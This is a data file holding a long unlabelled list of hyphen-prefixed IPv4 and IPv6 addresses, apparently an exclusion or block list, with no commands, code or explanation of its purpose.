-185.163.100.172 -142.91.241.117 -104.217.54.48 -45.64.169.63 -54.171.60.240 -103.66.219.77 -107.150.28.246 -54.183.253.223 -45.76.150.134 -198.200.41.27 -192.169.202.108 -192.232.195.180 -103.198.45.19 -23.238.145.115 -123.207.233.211 -69.50.209.198 -139.196.206.145 -115.28.39.86 -190.107.178.43 -193.104.170.87 -54.156.229.178 -113.116.151.4 -211.90.31.136 -116.255.219.180 -95.78.160.10 -116.213.115.115 -118.114.244.34 -184.154.181.206 -162.247.98.10 -112.74.126.8 -119.28.139.164 -198.56.192.93 -112.74.29.133 -119.147.139.131 -23.19.237.12 -119.28.2.18 -172.246.101.119 -216.104.35.67 -172.107.64.22 -103.20.34.131 -107.161.25.170 -95.211.121.177 -194.135.88.207 -218.70.85.82 -185.163.100.191 -58.64.136.111 -50.116.38.136 -103.100.157.78 -23.19.237.32 -182.254.228.34 -103.249.107.161 -104.217.58.23 -178.254.30.232 -172.246.101.238 -193.200.32.14 -123.57.250.60 -34.208.183.66 -46.165.245.224 -123.56.90.72 -45.76.149.145 -172.106.184.31 -217.116.194.20 -104.203.139.188 -120.26.62.127 -116.62.136.230 -101.200.90.226 -54.88.210.192 -133.18.54.17 -111.231.145.48 -120.25.154.112 -142.44.236.7 -103.84.175.6 -23.224.243.10 -218.60.13.17 -94.23.98.141 -103.231.167.206 -107.180.85.4 -158.69.210.167 -61.91.248.157 -91.126.204.56 -177.129.77.63 -103.47.13.254 -211.149.250.3 -79.137.44.111 -142.4.107.106 -113.196.233.161 -114.55.24.145 -59.46.13.45 -103.205.1.71 -111.47.7.141 -23.244.190.24 -113.196.233.205 -133.242.204.116 -121.41.83.10 -185.174.30.187 -120.24.54.62 -94.138.207.203 -91.230.243.162 -137.74.222.57 -217.116.120.240 -185.114.192.42 -103.21.79.90 -132.148.81.41 -95.211.153.57 -47.96.179.146 -5.135.214.86 -184.107.243.60 -23.238.176.237 -118.190.175.147 -103.12.49.3 -70.38.67.119 -49.212.184.42 -103.200.5.161 -185.9.248.199 -115.29.184.98 -107.180.84.49 -138.201.225.16 -198.251.87.5 -174.137.63.118 -120.25.214.229 -46.254.19.159 -173.192.32.144 -69.64.77.65 -39.108.163.168 -112.74.15.146 -23.225.89.146 -120.78.135.184 -115.231.95.171 -106.75.154.246 -221.226.38.166 -167.114.48.63 -185.174.30.207 -213.32.22.118 -5.39.41.205 -60.31.241.131 -217.172.189.252 -103.28.38.133 -23.244.241.219 -195.206.253.150 -23.104.180.17 -45.33.69.155 -103.59.47.240 -5.135.201.5 -195.248.234.147 -182.61.29.244 -45.76.149.194 -139.162.127.62 -217.174.148.44 -47.93.239.118 -173.214.170.134 -103.91.58.186 -115.28.20.232 -116.62.70.118 -188.132.147.2 -45.76.6.208 -119.23.212.51 -181.198.13.62 -35.199.144.226 -139.196.253.15 -69.30.211.211 -62.63.156.61 -185.229.88.9 -122.114.42.103 -46.32.232.52 -23.229.227.184 -45.63.40.192 -115.29.160.14 -103.75.56.93 -198.50.195.127 -99.192.219.71 -198.251.67.24 -103.28.47.117 -198.143.130.118 -121.43.166.234 -121.42.15.204 -78.140.198.30 -86.104.177.65 -52.196.124.51 -34.234.89.71 -178.209.118.243 -116.247.94.38 -172.106.184.52 -119.28.137.42 -103.232.121.37 -79.98.31.3 -137.74.97.110 -60.3.207.154 -112.124.124.45 -106.186.116.50 -173.230.152.252 -46.51.182.249 -121.40.26.221 -104.243.42.182 -142.91.243.95 -172.106.184.27 -5.189.152.70 -142.91.239.95 -45.42.94.175 -164.132.181.159 -147.135.184.226 -113.196.233.231 -120.77.223.204 -114.215.171.105 -172.107.73.220 -203.123.51.195 -2a01:4f8:212:37d9::2 -120.26.82.221 -134.119.143.77 -121.40.118.234 -45.76.114.245 -209.126.122.153 -207.182.148.130 -120.24.153.179 -46.254.19.121 -81.180.84.202 -104.232.75.164 -37.46.128.217 -172.104.49.158 -139.129.15.9 -120.192.73.178 -121.43.229.32 -2a01:7e0:0:198::d4e0:5352 -50.97.137.244 -115.29.14.162 -112.121.188.252 -45.79.188.192 -123.57.1.43 -107.180.79.239 -108.178.29.131 -120.77.49.169 -218.89.178.108 -47.52.89.232 -124.193.134.197 -123.207.63.66 -172.107.75.208 -112.53.105.57 -104.203.82.54 -107.187.41.138 -113.98.254.150 -95.213.136.100 -47.89.54.78 -52.87.213.74 -139.129.195.62 -23.104.135.143 -74.207.249.47 -104.207.52.85 -52.68.203.116 -60.32.6.196 -177.80.96.4 -158.69.25.74 -211.149.173.251 -37.59.48.100 -23.19.237.60 -151.80.255.19 -23.225.0.216 -23.104.177.43 -103.49.205.120 -216.24.205.44 -45.114.94.30 -94.236.0.90 -91.109.15.212 -217.150.212.17 -23.19.202.33 -103.205.0.93 -23.88.82.168 -23.104.135.26 -101.200.231.26 -96.8.127.37 -92.222.95.71 -115.28.183.198 -121.196.203.228 -37.59.168.136 -23.224.115.15 -46.38.62.183 -217.116.120.155 -218.205.182.134 -121.127.225.76 -144.217.81.182 -172.255.159.233 -23.234.22.29 -114.215.121.167 -112.116.106.250 -142.4.107.205 -198.154.222.128 -185.169.197.20 -122.114.46.211 -47.52.144.94 -39.108.95.220 -180.97.69.31 -176.31.225.34 -43.241.253.156 -142.91.95.195 -23.110.47.226 -123.207.33.254 -107.190.233.77 -50.18.19.16 -104.207.50.85 -123.129.245.229 -188.165.36.13 -111.223.52.33 -61.190.90.253 -120.27.203.20 -123.56.222.157 -117.78.24.24 -60.205.149.32 -23.104.176.15 -45.61.114.61 -119.23.22.170 -185.124.87.30 -139.196.107.64 -67.229.58.212 -5.189.167.82 -200.162.143.18 -5.135.138.41 -189.84.208.160 -120.27.163.205 -27.0.12.220 -114.113.157.164 -62.149.16.104 -101.200.235.76 -23.88.82.163 -103.12.50.55 -120.78.199.68 -218.24.35.77 -104.207.52.115 -91.227.16.31 -107.150.57.26 -45.35.99.144 -34.203.242.2 -217.199.163.223 -45.35.125.36 -171.244.17.108 -23.224.115.204 -23.19.238.35 -121.42.179.14 -222.172.220.13 -122.114.47.32 -98.126.219.114 -45.33.16.100 -120.26.62.202 -27.255.79.48 -61.55.164.52 -210.120.248.54 -177.101.145.32 -148.251.162.133 -121.41.36.171 -103.75.46.107 -195.10.21.134 -114.55.24.107 -47.88.62.115 -85.214.235.90 -103.30.7.248 -39.106.223.156 -120.24.172.148 -23.104.135.225 -62.109.3.33 -117.27.139.16 -111.20.68.246 -121.42.230.234 -120.27.95.95 -23.225.0.28 -164.132.213.39 -94.130.27.247 -54.165.175.118 -123.56.108.56 -5.196.214.133 -172.104.234.64 -185.29.122.105 -103.198.45.18 -91.121.138.163 -142.4.103.115 -120.77.145.92 -120.25.205.150 -107.164.66.24 -23.244.241.228 -37.46.133.75 -96.30.50.32 -121.40.36.107 -121.8.235.139 -166.63.21.10 -103.9.157.152 -69.164.214.227 -122.114.194.184 -23.104.176.43 -36.33.16.59 -122.10.115.68 -87.98.131.159 -92.222.98.132 -89.19.22.226 -162.255.163.141 -201.190.12.130 -104.232.75.166 -103.205.1.76 -142.91.232.88 -104.203.139.182 -174.137.49.29 -23.104.187.54 -123.207.140.88 -23.110.56.88 -118.178.228.77 -211.149.178.60 -104.217.62.4 -185.174.29.231 -185.17.41.116 -123.150.140.114 -120.24.173.122 -104.203.139.18 -178.73.199.254 -18.144.3.81 -92.43.36.101 -203.93.237.210 -203.195.148.190 -23.88.82.62 -23.225.0.214 -169.55.53.189 -23.104.135.76 -109.201.146.62 -219.141.8.131 -136.0.69.129 -76.224.80.107 -23.225.89.33 -207.246.102.75 -211.149.155.231 -120.25.206.167 -104.250.135.9 -185.174.29.184 -202.181.172.162 -204.93.61.64 -192.99.219.218 -123.207.231.158 -85.25.210.251 -103.12.50.18 -103.100.157.44 -211.159.185.69 -113.31.72.207 -116.62.214.228 -117.18.15.35 -139.129.38.194 -121.201.9.97 -173.0.63.106 -119.27.181.56 -182.92.149.154 -153.126.157.85 -23.224.115.33 -34.224.51.162 -104.217.58.17 -52.196.231.37 -112.121.165.67 -103.209.234.69 -45.35.125.50 -54.175.46.13 -45.117.175.2 -118.190.5.192 -188.165.130.120 -122.227.235.244 -46.30.41.8 -63.142.253.243 -95.211.187.166 -210.56.23.99 -115.29.143.159 -187.110.224.233 -23.104.177.24 -72.52.69.156 -190.187.107.68 -23.110.47.213 -91.231.84.133 -103.75.46.86 -121.40.78.124 -47.94.22.54 -23.19.202.47 -23.244.190.14 -125.231.79.59 -49.212.139.220 -23.244.190.185 -185.136.85.111 -23.104.135.58 -81.19.156.117 -23.224.115.36 -23.225.89.90 -54.205.246.53 -121.41.46.69 -142.91.232.115 -114.55.42.181 -104.207.44.91 -172.107.147.27 -103.212.223.162 -185.98.63.137 -119.29.19.100 -216.157.100.122 -120.26.84.87 -199.102.46.222 -23.229.227.185 -120.27.155.66 -184.72.53.97 -188.116.54.243 -192.162.241.177 -66.70.164.148 -142.91.241.99 -54.86.165.79 -58.241.163.174 -178.236.234.60 -192.99.78.20 -158.69.99.232 -134.119.30.22 -158.69.36.1 -198.24.161.134 -61.131.207.178 -107.191.103.181 -89.108.75.79 -148.251.151.203 -166.63.21.54 -142.91.241.113 -100.42.32.224 -114.55.112.147 -103.198.45.12 -118.184.57.79 -123.184.42.73 -114.55.33.51 -111.13.26.183 -172.104.129.111 -118.89.158.19 -116.95.218.155 -46.149.115.116 -123.56.85.232 -23.224.115.118 -192.237.202.146 -64.120.16.244 -121.40.141.180 -123.56.185.206 -120.26.49.180 -34.240.185.248 -185.105.10.33 -164.70.8.163 -212.83.132.99 -120.26.206.80 -106.75.134.47 -23.225.89.48 -54.37.222.34 -188.40.114.12 -67.220.188.99 -42.96.194.209 -139.129.129.1 -23.110.61.95 -103.205.1.119 -185.53.12.130 -163.172.29.23 -65.60.5.108 -103.205.0.70 -104.207.50.67 -211.149.231.31 -173.255.211.16 -123.57.222.123 -220.178.224.118 -103.96.151.46 -115.28.162.186 -211.155.88.133 -23.225.147.186 -23.225.0.118 -175.45.49.120 -23.230.19.2 -142.91.243.74 -85.214.208.168 -45.61.113.35 -115.218.63.109 -172.107.71.43 -23.225.0.37 -60.251.83.155 -101.200.218.243 -58.214.3.6 -167.114.164.249 -52.76.209.129 -103.24.1.113 -178.170.165.35 -43.243.222.126 -188.252.69.116 -185.117.88.10 -176.107.254.4 -207.148.16.6 -23.224.244.44 -202.47.95.212 -121.41.122.40 -5.39.63.27 -85.25.255.211 -23.225.89.126 -218.19.216.156 -37.97.207.183 -101.200.234.91 -93.104.214.204 -209.58.177.67 -120.24.217.21 -142.91.95.186 -123.57.147.143 -46.140.191.67 -23.19.202.8 -78.24.216.60 -81.171.38.192 -213.85.76.19 -121.42.50.150 -103.30.246.79 -114.55.228.134 -47.93.144.130 -123.56.207.97 -54.244.114.162 -23.225.113.215 -54.85.248.70 -149.202.243.168 -23.104.187.28 -23.110.56.114 -27.254.80.140 -198.2.215.203 -195.211.84.30 -60.216.6.52 -62.75.230.185 -79.98.25.246 -103.20.248.130 -103.28.37.227 -185.155.99.111 -118.190.172.68 -67.229.73.70 -49.212.165.247 -136.0.69.119 -121.40.49.60 -47.93.231.55 -207.198.106.88 -121.40.125.70 -142.4.107.116 -107.180.84.3 -95.211.193.53 -125.253.116.62 -172.255.159.252 -104.203.82.56 -123.57.39.13 -144.168.72.132 -23.244.241.43 -202.182.57.82 -23.225.113.56 -104.168.145.7 -45.122.253.30 -39.108.147.154 -101.37.172.12 -223.223.176.59 -211.233.63.181 -193.17.230.77 -193.111.161.4 -103.28.37.129 -120.76.212.245 -139.196.105.122 -23.225.89.129 -121.35.251.17 -45.61.114.40 -142.91.243.110 -109.169.86.234 -23.225.113.123 -198.50.194.86 -117.34.7.19 -210.143.65.173 -116.62.5.62 -153.37.192.13 -23.225.89.254 -103.28.38.175 -104.207.44.125 -64.110.129.96 -82.221.139.44 -221.122.112.177 -119.29.135.66 -86.104.177.77 -189.80.20.213 -23.225.0.247 -202.74.40.122 -122.144.200.7 -114.55.89.110 -103.205.0.74 -107.155.108.204 -117.22.255.68 -218.32.216.189 -85.17.174.129 -23.110.56.89 -37.59.63.41 -122.225.221.178 -121.52.154.238 -60.172.229.252 -124.232.153.52 -31.28.166.173 -74.86.126.227 -139.224.28.135 -153.122.116.29 -103.230.120.245 -116.196.90.159 -172.107.71.6 -106.75.6.170 -45.35.102.152 -107.151.76.139 -136.0.69.28 -101.236.34.150 -70.36.125.41 -119.28.11.156 -107.165.201.47 -104.238.74.240 -103.198.45.51 -74.91.20.146 -23.225.113.63 -120.26.58.180 -115.29.174.84 -45.56.83.58 -220.165.4.21 -172.104.48.5 -104.217.58.5 -123.150.244.22 -64.120.123.240 -118.190.102.245 -194.24.228.35 -185.93.245.196 -175.170.182.101 -118.97.107.102 -211.149.199.98 -119.23.150.252 -85.143.218.45 -47.93.195.152 -118.69.173.211 -46.30.46.166 -120.27.197.73 -61.8.43.104 -158.69.36.8 -46.20.157.50 -103.100.157.175 -65.60.28.169 -216.155.154.169 -18.144.5.44 -107.180.79.240 -115.29.228.194 -185.53.174.253 -203.123.51.194 -136.0.69.191 -103.205.2.72 -115.29.224.59 -107.164.66.125 -198.200.41.18 -101.226.174.152 -180.153.86.98 -47.92.88.101 -175.41.24.102 -31.206.33.8 -103.43.45.196 -115.28.153.67 -120.24.1.6 -104.203.139.170 -120.25.153.102 -60.205.205.144 -118.184.0.154 -91.218.229.80 -58.16.248.38 -45.114.94.6 -213.160.153.186 -118.178.226.136 -23.104.135.14 -104.232.75.170 -47.52.17.242 -2a00:1158:1000:404::247 -106.14.96.162 -144.168.72.136 -47.52.20.57 -58.67.156.64 -120.77.209.76 -23.224.115.209 -106.186.123.164 -23.224.115.57 -37.205.8.206 -54.238.55.0 -103.12.50.48 -149.56.36.187 -52.5.79.195 -185.8.238.72 -182.92.177.94 -120.77.207.1 -217.160.132.26 -52.54.9.12 -65.60.43.189 -65.18.113.60 -116.236.231.215 -136.0.69.187 -208.122.50.10 -104.203.139.234 -85.11.0.230 -182.76.161.219 -36.55.231.181 -66.135.33.146 -88.119.50.58 -223.82.254.70 -77.222.50.42 -192.169.226.5 -114.80.116.152 -95.218.211.81 -177.234.158.99 -37.187.114.41 -185.154.52.150 -202.158.39.170 -211.149.198.6 -175.6.27.49 -172.255.159.237 -61.241.194.134 -123.56.65.236 -51.255.1.166 -121.43.200.105 -117.18.0.38 -34.229.199.205 -202.6.17.144 -106.14.125.76 -118.244.232.230 -95.218.94.128 -52.49.198.235 -164.132.223.252 -67.228.247.4 -101.200.208.233 -176.34.228.196 -115.146.121.215 -112.74.203.60 -115.29.113.75 -120.76.189.15 -153.36.232.84 -122.10.114.21 -23.88.82.39 -88.99.140.174 -139.129.111.73 -31.31.78.41 -142.91.95.56 -85.25.79.91 -107.155.81.190 -61.235.114.150 -23.19.202.12 -185.83.147.157 -121.41.48.50 -121.201.30.87 -139.162.40.76 -212.47.245.245 -82.135.148.230 -193.70.110.133 -218.32.216.242 -107.187.41.10 -108.61.23.141 -47.92.84.89 -103.221.220.110 -101.200.196.124 -123.207.153.130 -162.247.76.174 -104.207.44.69 -199.102.46.216 -163.172.255.135 -185.158.153.120 -140.137.31.150 -123.56.81.190 -92.51.148.51 -112.124.97.191 -60.12.231.194 -132.148.136.234 -208.109.119.53 -212.84.66.229 -37.48.80.150 -120.26.129.167 -120.55.42.233 -92.222.98.144 -50.116.16.187 -67.222.143.102 -5.134.122.163 -52.198.58.231 -209.126.76.56 -114.80.200.78 -195.2.253.133 -103.84.89.60 -103.209.234.216 -222.190.155.146 -115.28.107.32 -185.163.100.30 -142.91.95.248 -178.32.63.201 -119.81.57.198 -182.254.136.36 -66.70.192.188 -172.107.146.175 -104.217.67.76 -5.196.197.135 -47.95.220.32 -101.200.240.52 -142.91.243.111 -202.28.247.125 -103.209.234.80 -104.155.23.40 -122.114.45.135 -5.79.97.54 -123.207.250.94 -139.196.31.41 -118.144.82.164 -130.185.74.70 -93.170.136.52 -173.214.170.132 -122.114.36.47 -120.76.24.143 -107.165.201.104 -198.50.228.154 -183.61.146.224 -45.76.100.68 -139.196.45.115 -158.69.36.16 -107.6.183.140 -83.166.240.122 -54.234.244.75 -198.58.115.231 -185.164.138.218 -91.215.216.76 -123.196.115.86 -23.225.113.39 -142.91.95.40 -107.160.44.227 -153.122.105.77 -23.225.0.182 -123.57.20.83 -142.4.119.106 -121.40.94.109 -178.33.205.54 -125.212.220.189 -192.99.8.204 -119.29.77.138 -66.7.196.233 -123.124.1.162 -112.74.110.16 -94.56.137.90 -120.77.170.169 -72.249.127.175 -115.28.138.182 -52.200.212.20 -87.106.240.101 -185.174.28.107 -104.207.52.123 -23.88.82.165 -172.104.39.39 -45.76.149.253 -66.128.60.254 -123.57.142.100 -172.107.146.181 -158.69.2.187 -178.20.158.214 -122.226.223.212 -103.100.157.88 -212.32.243.133 -52.91.67.121 -104.203.139.253 -185.163.100.15 -23.104.135.207 -39.104.100.234 -82.165.154.178 -175.160.130.5 -218.89.168.133 -203.205.37.219 -95.213.223.170 -104.207.50.96 -222.122.226.167 -61.64.57.135 -211.103.20.154 -124.232.147.116 -183.61.16.161 -5.135.58.108 -107.187.41.215 -120.25.83.114 -103.100.157.128 -23.104.135.219 -54.167.48.216 -91.207.203.253 -91.212.205.216 -66.85.186.62 -27.124.94.86 -115.29.205.247 -184.107.219.77 -34.226.196.159 -106.14.194.217 -185.94.236.53 -39.106.248.9 -172.106.184.59 -139.199.223.176 -104.203.82.2 -52.30.99.204 -185.65.245.6 -104.149.66.174 -120.0.52.65 -23.110.61.106 -198.100.156.73 -120.131.5.241 -66.254.190.203 -162.144.53.225 -64.15.140.192 -120.24.39.147 -45.64.168.12 -218.94.154.118 -64.118.95.121 -103.205.3.113 -202.6.17.141 -118.190.45.82 -207.244.68.180 -43.228.245.27 -23.225.89.135 -175.45.18.150 -23.225.89.187 -45.42.94.187 -142.44.201.203 -91.194.90.9 -54.78.124.74 -64.146.232.106 -172.87.27.79 -176.31.16.34 -185.174.28.138 -104.250.135.23 -103.200.32.196 -13.250.227.36 -107.180.84.66 -174.37.242.32 -123.103.63.154 -60.253.124.38 -54.238.151.213 -202.93.217.197 -5.160.219.57 -103.12.50.41 -222.174.255.12 -109.169.76.63 -104.238.135.215 -185.66.142.54 -103.209.234.88 -120.77.55.45 -171.14.210.211 -184.72.46.79 -142.4.107.241 -114.215.223.14 -23.225.113.154 -103.12.50.22 -183.129.155.242 -23.110.61.88 -118.190.95.152 -52.87.208.213 -122.114.44.250 -139.224.232.21 -23.225.0.90 -115.231.163.32 -213.32.70.154 -112.74.125.198 -91.227.16.117 -58.23.153.178 -34.201.57.0 -67.229.73.79 -45.33.100.125 -76.12.219.17 -111.204.194.221 -172.104.44.14 -104.238.95.163 -124.115.229.243 -61.178.153.92 -185.112.40.187 -54.162.149.152 -104.203.139.65 -118.89.232.240 -139.5.200.197 -222.95.251.199 -54.64.105.21 -220.194.59.136 -142.91.239.83 -106.14.206.183 -104.203.139.227 -115.85.80.96 -103.100.157.215 -125.212.218.200 -104.149.66.137 -133.242.195.156 -123.207.119.149 -45.79.75.247 -101.37.83.205 -178.33.15.232 -37.230.114.13 -109.73.168.219 -45.56.84.64 -115.28.79.230 -218.244.145.121 -79.124.13.22 -113.113.92.62 -51.254.156.63 -91.121.57.39 -107.190.235.68 -142.0.129.17 -103.209.234.50 -173.198.209.82 -23.244.241.129 -115.159.50.44 -120.25.121.208 -91.238.177.48 -178.63.25.92 -115.28.55.64 -23.238.145.82 -67.229.77.195 -5.196.66.38 -194.247.12.231 -139.199.39.151 -61.191.55.85 -104.203.139.111 -68.64.163.74 -112.16.45.57 -49.212.191.34 -45.77.36.238 -115.28.137.113 -121.40.180.219 -223.165.5.5 -45.41.92.158 -119.29.182.165 -114.67.229.81 -103.213.248.194 -119.23.135.226 -208.43.222.110 -193.138.233.120 -199.217.112.81 -121.40.89.73 -149.56.165.161 -23.230.19.63 -72.1.245.126 -122.228.116.88 -114.255.138.154 -139.224.2.8 -107.164.66.171 -185.163.100.92 -103.209.234.136 -31.31.194.101 -89.108.107.206 -52.91.115.187 -107.187.41.112 -149.202.103.233 -113.108.253.234 -81.196.25.44 -107.165.201.185 -107.6.117.152 -88.150.157.164 -69.64.73.239 -221.214.177.54 -115.28.246.137 -67.228.171.236 -31.179.223.51 -52.90.174.128 -149.210.198.248 -64.120.123.245 -114.215.211.123 -37.59.48.25 -92.53.120.146 -23.225.0.136 -120.197.53.150 -210.51.3.51 -112.74.197.143 -119.29.114.214 -203.141.153.91 -121.196.217.29 -92.50.166.106 -192.99.78.26 -123.57.219.194 -23.225.89.249 -134.0.112.183 -46.137.121.156 -95.211.75.205 -122.114.38.211 -209.126.96.46 -142.4.107.94 -185.131.50.85 -107.164.66.25 -174.139.52.174 -103.209.234.171 -42.51.193.111 -115.29.28.166 -85.204.50.32 -119.81.31.217 -202.174.122.11 -23.104.177.38 -177.221.60.121 -95.77.176.166 -64.118.92.9 -193.108.251.70 -120.77.100.109 -34.217.44.107 -192.99.0.5 -192.99.0.5 -124.160.70.124 -59.10.169.93 -108.179.223.137 -54.208.238.255 -188.165.164.170 -103.205.0.99 -45.32.102.193 -103.12.50.35 -142.4.107.71 -45.252.249.168 -217.199.165.49 -222.187.224.71 -199.102.46.221 -213.208.178.90 -195.248.235.32 -172.107.75.217 -117.156.24.126 -45.115.36.49 -172.255.159.202 -37.187.46.205 -139.196.169.65 -123.206.174.80 -121.42.34.242 -39.108.5.119 -139.196.193.224 -106.15.39.128 -118.31.239.199 -60.206.36.26 -155.94.163.93 -193.200.139.21 -109.169.86.236 -123.56.216.179 -96.44.177.187 -173.245.72.91 -169.54.217.87 -118.184.28.108 -45.32.236.81 -173.198.201.78 -85.24.136.205 -104.238.198.193 -14.148.82.38 -115.159.27.33 -173.212.238.244 -112.78.6.71 -122.114.45.234 -202.40.176.98 -54.86.81.94 -121.78.196.155 -54.225.181.104 -104.217.62.49 -185.174.30.178 -103.205.0.88 -162.213.254.76 -112.53.68.38 -211.149.172.139 -150.95.133.20 -47.52.220.93 -139.199.188.119 -203.192.177.183 -202.141.160.119 -47.89.32.197 -23.244.241.64 -179.43.96.141 -120.76.72.233 -45.35.102.183 -122.114.42.80 -188.132.148.63 -149.202.103.234 -190.111.6.249 -37.59.43.153 -142.91.95.170 -103.53.224.70 -45.114.94.251 -111.17.208.20 -91.134.242.94 -185.25.22.26 -121.40.85.202 -45.35.99.172 -23.88.82.217 -118.26.171.87 -120.25.250.144 -207.248.230.188 -185.146.87.81 -39.107.109.230 -198.50.138.170 -188.116.9.175 -107.6.183.141 -104.217.54.5 -23.19.237.61 -198.27.110.167 -104.197.152.104 -103.209.234.32 -23.224.115.5 -111.230.5.110 -95.211.13.179 -54.255.2.219 -138.201.38.139 -209.59.166.204 -172.106.184.2 -104.203.139.48 -194.28.173.171 -111.230.148.30 -37.187.179.59 -162.247.235.72 -110.53.23.109 -42.51.42.201 -139.162.53.60 -166.63.21.28 -111.113.20.70 -221.10.205.43 -104.203.139.14 -100.43.157.122 -163.172.194.20 -194.44.63.235 -23.252.168.53 -142.4.107.232 -51.254.27.123 -103.28.36.232 -173.254.193.149 -198.200.41.75 -54.36.11.19 -101.200.157.192 -192.225.231.166 -34.214.118.160 -46.145.192.200 -92.222.46.197 -120.76.31.6 -123.57.34.142 -103.230.120.234 -185.174.30.132 -23.104.180.48 -139.196.188.32 -2400:8901::f03c:91ff:fe08:7a00 -92.222.134.52 -162.247.78.82 -182.92.177.155 -36.110.218.205 -104.203.139.51 -198.61.147.94 -172.110.7.61 -119.29.72.119 -91.206.30.14 -144.217.243.241 -121.40.133.157 -157.119.116.73 -142.91.239.82 -54.200.70.180 -120.78.205.193 -209.126.113.32 -45.32.121.189 -172.104.181.164 -13.228.2.116 -51.15.139.252 -47.88.33.242 -166.62.33.134 -54.37.170.67 -5.196.149.223 -47.93.85.64 -120.194.200.78 -185.115.32.92 -114.55.26.159 -172.246.101.118 -23.110.56.107 -23.104.180.50 -45.77.35.223 -185.216.213.124 -34.216.238.164 -31.186.99.189 -66.7.238.68 -120.24.164.180 -104.203.82.216 -212.83.155.233 -104.217.67.82 -137.59.23.5 -185.67.0.157 -23.19.237.58 -101.201.208.81 -199.38.119.138 -112.124.52.122 -121.40.180.20 -82.135.151.47 -96.44.172.84 -104.203.139.210 -91.210.191.102 -158.69.36.22 -217.218.249.23 -23.224.115.226 -172.246.101.253 -185.13.58.202 -23.224.115.13 -45.32.60.147 -172.246.101.70 -120.24.42.43 -198.27.77.235 -144.217.83.186 -120.77.222.133 -69.87.198.123 -172.107.64.27 -117.69.118.255 -107.187.41.191 -67.229.73.93 -89.33.247.142 -178.33.107.68 -59.110.0.103 -106.12.31.148 -195.154.253.216 -123.207.234.153 -23.238.166.134 -52.71.230.144 -104.203.139.241 -190.0.27.211 -188.132.147.146 -107.180.84.48 -221.239.91.157 -104.130.179.188 -65.18.120.22 -52.38.17.129 -5.255.93.229 -120.76.131.155 -211.149.156.117 -37.187.214.173 -45.63.68.236 -139.162.247.186 -162.247.235.76 -133.242.201.38 -123.56.248.199 -106.14.241.17 -115.159.28.231 -172.107.75.212 -104.217.62.15 -120.27.121.188 -104.232.75.163 -166.63.21.60 -123.207.227.91 -23.19.238.5 -58.216.8.131 -50.18.157.172 -120.26.73.124 -58.250.71.178 -198.50.153.55 -61.110.254.13 -185.174.31.227 -82.135.148.219 -148.251.85.164 -103.31.46.172 -185.174.28.147 -113.108.204.84 -23.19.238.19 -120.78.201.222 -79.137.48.230 -45.33.77.211 -103.254.71.211 -218.32.216.161 -78.41.77.200 -137.74.229.182 -222.222.124.163 -58.216.8.157 -120.27.24.50 -54.37.54.7 -119.61.7.48 -42.121.17.36 -211.149.212.192 -118.142.69.131 -88.99.171.56 -101.201.49.50 -193.93.221.167 -120.79.73.83 -58.56.241.124 -5.189.152.65 -120.132.33.234 -115.159.181.134 -92.247.31.38 -89.32.201.29 -202.55.227.36 -180.167.51.170 -198.178.126.32 -145.239.77.8 -139.199.76.128 -106.15.60.79 -177.22.81.68 -149.202.203.3 -45.61.113.23 -192.169.250.19 -115.28.150.78 -180.96.27.93 -120.26.80.231 -89.218.38.228 -177.85.112.186 -187.157.228.140 -120.194.77.50 -173.231.184.52 -118.89.17.48 -23.104.135.193 -198.44.190.143 -103.80.28.161 -104.130.252.15 -123.56.130.87 -108.170.39.91 -160.16.59.122 -36.110.114.127 -104.217.54.18 -119.23.34.34 -101.200.135.235 -23.23.247.30 -45.35.102.185 -88.80.189.197 -172.246.101.186 -120.25.145.122 -195.254.156.36 -103.205.1.85 -37.187.210.140 -111.1.117.146 -123.207.235.66 -211.149.247.183 -185.56.88.199 -182.61.11.247 -200.37.202.98 -117.71.48.145 -59.110.237.153 -60.205.93.149 -23.227.190.245 -103.209.234.22 -184.107.98.95 -185.106.23.5 -23.91.100.90 -198.58.109.126 -64.118.87.196 -121.42.174.226 -59.110.165.108 -178.87.60.136 -54.221.208.222 -193.104.170.23 -180.152.123.188 -45.125.216.229 -212.68.50.215 -23.230.19.8 -51.255.131.44 -201.67.42.10 -39.106.15.201 -142.91.239.89 -47.100.164.59 -23.228.73.234 -115.159.83.191 -106.14.77.138 -142.91.239.74 -103.200.32.194 -120.24.6.238 -121.9.212.57 -144.217.184.205 -120.77.73.154 -88.213.206.50 -139.196.22.44 -163.172.167.81 -45.32.231.178 -45.41.92.135 -31.28.24.130 -120.76.167.51 -121.199.56.25 -120.24.15.201 -211.149.225.16 -166.78.226.229 -172.106.186.52 -123.57.208.26 -104.224.233.58 -123.56.14.88 -104.203.139.13 -119.23.240.236 -115.28.132.179 -103.209.234.225 -5.189.138.89 -104.203.139.239 -42.235.252.152 -14.157.104.184 -144.76.186.112 -185.174.31.226 -149.56.233.53 -202.181.169.98 -34.207.125.6 -120.26.61.17 -194.58.39.57 -23.234.53.216 -81.171.34.32 -112.91.168.207 -13.112.76.162 -41.77.115.206 -172.107.75.226 -120.76.117.254 -81.22.102.145 -167.114.54.82 -172.255.159.194 -154.66.196.235 -198.50.142.174 -101.200.3.4 -154.127.60.248 -118.190.102.174 -166.63.21.62 -107.165.201.86 -112.126.73.22 -210.75.17.217 -54.191.213.158 -113.196.233.202 -202.10.78.120 -65.52.220.164 -67.229.58.194 -23.244.241.229 -61.158.162.6 -202.47.95.216 -192.169.201.104 -200.24.90.6 -120.76.24.62 -23.104.177.52 -104.203.139.55 -107.151.78.205 -47.92.37.31 -85.17.174.136 -120.25.224.129 -172.107.146.137 -101.227.102.236 -117.54.3.130 -199.102.44.104 -47.92.72.120 -54.248.233.2 -118.190.139.219 -172.104.36.31 -51.255.83.18 -120.25.125.145 -103.235.234.211 -54.215.15.178 -43.229.153.38 -70.36.125.59 -120.76.236.214 -104.203.82.103 -117.63.194.114 -103.205.2.83 -69.87.199.13 -103.254.211.205 -23.104.187.37 -103.209.234.142 -195.202.93.51 -146.196.65.13 -23.238.129.109 -67.23.44.86 -77.120.122.199 -120.24.72.65 -147.135.206.185 -116.62.52.109 -120.42.1.204 -67.229.63.105 -104.194.233.36 -52.199.19.97 -195.12.172.171 -114.67.236.194 -139.162.48.20 -58.20.235.206 -202.191.66.54 -103.74.118.80 -95.213.136.98 -104.145.233.158 -167.114.131.175 -218.244.159.132 -202.102.137.45 -217.78.5.189 -116.255.190.103 -72.14.190.79 -218.27.37.122 -122.114.159.41 -96.44.167.102 -123.127.41.166 -103.224.23.97 -109.232.223.13 -5.135.58.79 -153.92.42.172 -121.40.102.100 -162.209.215.165 -185.174.30.205 -103.205.2.67 -98.179.145.187 -121.40.132.98 -221.226.142.2 -180.178.33.109 -60.220.210.165 -123.207.61.218 -183.60.127.56 